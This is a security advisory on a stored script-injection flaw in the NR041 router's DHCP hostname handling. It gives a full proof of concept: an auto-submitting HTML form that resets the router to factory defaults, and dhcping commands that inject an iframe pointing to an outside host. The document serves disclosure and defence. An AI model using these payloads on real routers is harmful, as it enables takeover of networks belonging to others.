|
|
|
|
| |
The Network Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your Cable or DSL modem. The router lets your PCs share one IP address from your ISP, files, printers and other resources. It can also function as a DHCP server for easy IP assignment".
DHCP HOSTNAME options originating from clients aren't properly filtered for malicious content. Due to this fact, malicious script code can be injected and stored on the router. |
| |
Credit:
The information has been provided by Mathieu Lacroix.
|
| |
Vulnerable Systems:
* NR041 firmware revision 1.2 release 03
Since the router doesn't filter out potentially problematic content it is easily possible to inject script code into the web-based administrative interface. At such a time when the administrator consults the DHCP interface, the script code will be executed in the open session by the browser and due to the nature of the session, will have full access to the router. One possible and easily executed attack is to cause the script to reset the router to its factory defaults, rolling back the administration password as well.
Since the DHCP daemon is only accessible from within a local network it would be hard to exploit. However, if a way exists to issue DHCP requests to the router, this vulnerability can be exploited.
A proof of concept can be carried out using DHCPing, available from http://c3rb3r.openwall.net/dhcping/.
As mentioned above, the NR041 is configurable via a web based administrative interface using several CGIs and invoked with the HTTP POST method. It isn't entirely easy to exploit under the circumstances (15 character string which you cannot break where ever you wish) but a known trick from the exploitation of the DLINK 614+ can be used for assistance.
* Step 1:
Because there isn't enough room to perform adequate exploitation in one shot, a different approach can be used. Injecting code for an IFRAME that will force the browser to to remotely call a certain HTML file, i.e.: "a.htm" on a malicious website. This file contains a form which will auto-submit itself when loaded. The code for such an HTML file is presented below. However it is important to note that due to length limitations the filename should be as short as possible:
< html>< head>
< script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
< form name=xx method=post action="http://192.168.1.1/passwd.cgi">
< input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>
The actual attack carried out by this HTML file is to call passwd.cgi with the "factorydefaults" option enabled. Notice that the IP is hardcoded in this file but it can actually be obtained from the HTTP referrer header, making this script work seamlessly.
* Step 2:
Inject the script containing the IFRAME using DHCPing, like so:
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad
|
|
|
|
|
|
|
|
|
|
